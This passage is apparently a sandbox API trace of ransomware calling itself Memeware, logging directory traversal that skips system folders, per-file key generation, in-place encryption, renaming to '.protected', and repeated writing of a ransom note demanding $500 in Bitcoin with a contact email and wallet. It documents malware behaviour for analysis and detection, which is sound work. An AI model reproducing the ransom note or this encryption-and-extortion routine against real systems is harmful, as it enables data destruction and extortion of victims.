lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.440] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.440] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.440] CloseHandle (hObject=0xa4) returned 1 [0066.440] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="Windows") returned -1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files") returned -1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files (x86)") returned -1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="$Recycle.bin") returned 1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="System Volume Information") returned -1 [0066.440] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer") returned 41 [0066.440] lstrcmpW (lpString1="Event Viewer", lpString2=".") returned 1 [0066.440] lstrcmpW (lpString1="Event Viewer", lpString2="..") returned 1 [0066.440] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*") returned 43 [0066.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.441] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.441] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0066.441] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.441] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.441] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.441] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\.") returned 43 [0066.441] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.441] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.441] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.441] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.441] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.442] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.442] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.442] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\..") returned 44 [0066.442] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.442] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.442] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="Windows") returned -1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="Program Files") returned 1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="Program Files (x86)") returned 1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="$Recycle.bin") returned 1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="System Volume Information") returned 1 [0066.442] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views") 
returned 47 [0066.442] lstrcmpW (lpString1="Views", lpString2=".") returned 1 [0066.442] lstrcmpW (lpString1="Views", lpString2="..") returned 1 [0066.442] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*") returned 49 [0066.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.442] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.442] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.442] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.442] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.442] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.442] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\.") returned 49 [0066.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.443] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.443] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.443] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.443] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.443] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.443] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.443] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\..") returned 50 [0066.443] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.443] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.443] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: 
lpFindFileData=0x295ef20) returned 1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Windows") returned -1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files") returned -1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files (x86)") returned -1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="$Recycle.bin") returned 1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="System Volume Information") returned -1 [0066.443] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned 72 [0066.443] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2=".") returned 1 [0066.443] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2="..") returned 1 [0066.443] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*") returned 74 [0066.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0066.443] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.443] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.443] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.443] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.443] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.443] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\.") returned 74 [0066.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.444] FindNextFileW (in: hFindFile=0x447cc0, 
lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.444] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.444] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.444] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.444] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.444] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.444] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\..") returned 75 [0066.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.444] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.444] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0066.444] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0066.444] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt") returned 90 [0066.444] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\applicationviewsrootnode\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.444] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.444] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0066.445] lstrlenA (lpString="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") returned 684 [0066.445] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0066.445] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.445] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0066.445] CloseHandle (hObject=0xd4) returned 1 [0066.446] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.446] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.446] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\RESTORE_FILES.txt") returned 65 [0066.446] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.446] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.446] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.447] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.447] WriteFile (in: hFile=0xb4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.447] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.447] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.447] CloseHandle (hObject=0xb4) returned 1 [0066.448] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.448] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.448] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\RESTORE_FILES.txt") returned 59 [0066.448] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.448] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.448] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.449] lstrlenA (lpString="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") returned 684 [0066.449] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.449] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.449] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.449] CloseHandle (hObject=0xa4) returned 1 [0066.449] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="Windows") returned -1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files") returned -1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files (x86)") returned -1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="$Recycle.bin") returned 1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="System Volume Information") returned -1 [0066.449] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned 40 [0066.449] lstrcmpW (lpString1="IdentityCRL", lpString2=".") returned 1 [0066.449] lstrcmpW (lpString1="IdentityCRL", lpString2="..") returned 1 [0066.450] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*") returned 42 [0066.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.450] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.450] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.450] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.450] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.450] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.450] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\.") returned 42 [0066.450] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.450] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.450] 
lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.450] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.450] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.450] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.450] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.450] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\..") returned 43 [0066.450] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.450] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.450] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="Windows") returned -1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="Program Files") returned -1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="Program Files (x86)") returned -1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="$Recycle.bin") returned 1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="System Volume Information") returned -1 [0066.451] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0066.451] StrStrIW (lpFirst="ppcrlconfig.dll", lpSrch=".protected") returned 0x0 [0066.451] lstrcmpW (lpString1="ppcrlconfig.dll", lpString2="RESTORE_FILES.txt") returned -1 [0066.451] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.451] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.451] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.451] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0066.451] StrStrW (lpFirst="ppcrlconfig.dll", lpSrch=".txt") returned 0x0 [0066.451] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0066.451] StrStrW (lpFirst="ppcrlconfig.dll", lpSrch=".rar") returned 0x0 [0066.451] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0066.451] StrStrW (lpFirst="ppcrlconfig.dll", lpSrch=".zip") returned 0x0 [0066.451] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.475] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.475] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.476] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.476] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.486] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.494] CloseHandle (hObject=0xb4) returned 1 [0066.502] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.protected") returned 66 [0066.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.protected" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll.protected")) returned 1 [0066.503] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="Windows") returned -1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="Program Files") returned -1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="Program Files (x86)") returned -1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="$Recycle.bin") returned 1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="System Volume Information") returned -1 [0066.503] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0066.503] StrStrIW (lpFirst="ppcrlui.dll", lpSrch=".protected") returned 0x0 [0066.503] lstrcmpW (lpString1="ppcrlui.dll", lpString2="RESTORE_FILES.txt") returned -1 [0066.503] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.503] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.503] CreateFileW 
